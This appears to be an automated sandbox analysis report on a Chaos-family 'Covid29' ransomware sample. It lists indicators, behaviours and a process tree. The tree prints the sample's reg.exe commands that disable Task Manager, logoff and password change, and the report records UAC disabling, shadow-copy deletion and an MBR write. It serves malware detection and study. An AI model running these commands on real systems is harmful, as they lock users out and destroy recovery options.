Analysis
-
max time kernel
235s -
max time network
235s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
13-09-2024 20:33
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/pankoza2-pl/malwaredatabase-old/tree/main/Covid29-Ransomware
Resource
win11-20240802-en
General
-
Target
https://github.com/pankoza2-pl/malwaredatabase-old/tree/main/Covid29-Ransomware
Malware Config
Signatures
-
Chaos
Ransomware family first seen in June 2021.
-
Chaos Ransomware 4 IoCs
resource yara_rule behavioral1/files/0x000300000000069d-416.dat family_chaos behavioral1/memory/2300-424-0x0000000000590000-0x00000000005B0000-memory.dmp family_chaos behavioral1/memory/2960-513-0x0000000000400000-0x00000000005D5000-memory.dmp family_chaos behavioral1/memory/2960-520-0x0000000000400000-0x00000000005D5000-memory.dmp family_chaos -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 4044 bcdedit.exe 4500 bcdedit.exe -
pid Process 1320 wbadmin.exe -
Disables Task Manager via registry modification
-
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\covid29-is-here.txt svchost.exe -
Executes dropped EXE 4 IoCs
pid Process 1448 mbr.exe 2300 Cov29Cry.exe 972 svchost.exe 1360 Cov29LockScreen.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/2960-391-0x0000000000400000-0x00000000005D5000-memory.dmp upx behavioral1/memory/2960-513-0x0000000000400000-0x00000000005D5000-memory.dmp upx behavioral1/memory/2960-520-0x0000000000400000-0x00000000005D5000-memory.dmp upx -
Drops desktop.ini file(s) 34 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini svchost.exe File opened for modification C:\Users\Public\Music\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Links\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini svchost.exe File opened for modification C:\Users\Public\Documents\desktop.ini svchost.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini svchost.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-6179872-1886041298-1573312864-1000\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Videos\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini svchost.exe File opened for modification C:\Users\Public\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Music\desktop.ini svchost.exe File opened for modification C:\Users\Public\Videos\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Searches\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini svchost.exe File opened for modification C:\Users\Public\Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Documents\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 2 raw.githubusercontent.com 26 raw.githubusercontent.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 mbr.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7bwgka39w.jpg" svchost.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml UserOOBEBroker.exe File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\Panther\UnattendGC\setupact.log UserOOBEBroker.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log UserOOBEBroker.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml UserOOBEBroker.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 17 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shutdown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TrojanRansomCovid29.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mbr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cov29LockScreen.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FileCoAuth.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2736 PING.EXE 3488 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2644 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 2684 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133707333231612020" chrome.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\Local Settings chrome.exe -
Modifies registry key 1 TTPs 7 IoCs
pid Process 2636 reg.exe 2080 reg.exe 124 reg.exe 4988 reg.exe 3744 reg.exe 1592 reg.exe 3384 reg.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Covid29 Ransomware.zip:Zone.Identifier chrome.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 2736 PING.EXE 3488 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 972 svchost.exe -
Suspicious behavior: EnumeratesProcesses 39 IoCs
pid Process 4148 chrome.exe 4148 chrome.exe 4860 chrome.exe 4860 chrome.exe 4860 chrome.exe 4860 chrome.exe 2300 Cov29Cry.exe 2300 Cov29Cry.exe 2300 Cov29Cry.exe 2300 Cov29Cry.exe 2300 Cov29Cry.exe 2300 Cov29Cry.exe 2300 Cov29Cry.exe 2300 Cov29Cry.exe 2300 Cov29Cry.exe 2300 Cov29Cry.exe 2300 Cov29Cry.exe 2300 Cov29Cry.exe 2300 Cov29Cry.exe 2300 Cov29Cry.exe 2300 Cov29Cry.exe 2300 Cov29Cry.exe 972 svchost.exe 972 svchost.exe 972 svchost.exe 972 svchost.exe 972 svchost.exe 972 svchost.exe 972 svchost.exe 972 svchost.exe 972 svchost.exe 972 svchost.exe 972 svchost.exe 972 svchost.exe 972 svchost.exe 972 svchost.exe 972 svchost.exe 972 svchost.exe 972 svchost.exe -
Suspicious behavior: LoadsDriver 6 IoCs
pid Process 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 668 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe Token: SeShutdownPrivilege 4148 chrome.exe Token: SeCreatePagefilePrivilege 4148 chrome.exe -
Suspicious use of FindShellTrayWindow 33 IoCs
pid Process 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe 4148 chrome.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1176 PickerHost.exe 1360 Cov29LockScreen.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4148 wrote to memory of 3740 4148 chrome.exe 78 PID 4148 wrote to memory of 3740 4148 chrome.exe 78 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 1028 4148 chrome.exe 79 PID 4148 wrote to memory of 2128 4148 chrome.exe 80 PID 4148 wrote to memory of 2128 4148 chrome.exe 80 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 PID 4148 wrote to memory of 1104 4148 chrome.exe 81 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/pankoza2-pl/malwaredatabase-old/tree/main/Covid29-Ransomware1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4148 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb4ba1cc40,0x7ffb4ba1cc4c,0x7ffb4ba1cc582⤵PID:3740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1776,i,8842683910209296677,7865641287033414892,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=1748 /prefetch:22⤵PID:1028
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2024,i,8842683910209296677,7865641287033414892,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2084 /prefetch:32⤵PID:2128
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2144,i,8842683910209296677,7865641287033414892,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2336 /prefetch:82⤵PID:1104
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3076,i,8842683910209296677,7865641287033414892,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3104 /prefetch:12⤵PID:4260
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3092,i,8842683910209296677,7865641287033414892,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3148 /prefetch:12⤵PID:2012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4528,i,8842683910209296677,7865641287033414892,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4652 /prefetch:82⤵PID:1644
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3532,i,8842683910209296677,7865641287033414892,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4732 /prefetch:82⤵
- NTFS ADS
PID:3168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4804,i,8842683910209296677,7865641287033414892,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4724 /prefetch:12⤵PID:1188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1000,i,8842683910209296677,7865641287033414892,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5208 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4860
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:3548
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:1772
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1908
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc1⤵PID:2848
-
C:\Windows\System32\oobe\UserOOBEBroker.exeC:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding1⤵
- Drops file in Windows directory
PID:2784
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding1⤵
- System Location Discovery: System Language Discovery
PID:1456
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Covid29 Ransomware\readme.txt1⤵PID:3056
-
C:\Users\Admin\Desktop\Covid29 Ransomware\TrojanRansomCovid29.exe"C:\Users\Admin\Desktop\Covid29 Ransomware\TrojanRansomCovid29.exe"1⤵
- System Location Discovery: System Language Discovery
PID:2960 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A28B.tmp\TrojanRansomCovid29.bat" "2⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:440 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\A28B.tmp\fakeerror.vbs"3⤵
- System Location Discovery: System Language Discovery
PID:5004
-
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 23⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2736
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3744
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1592
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3384
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2636
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2080
-
-
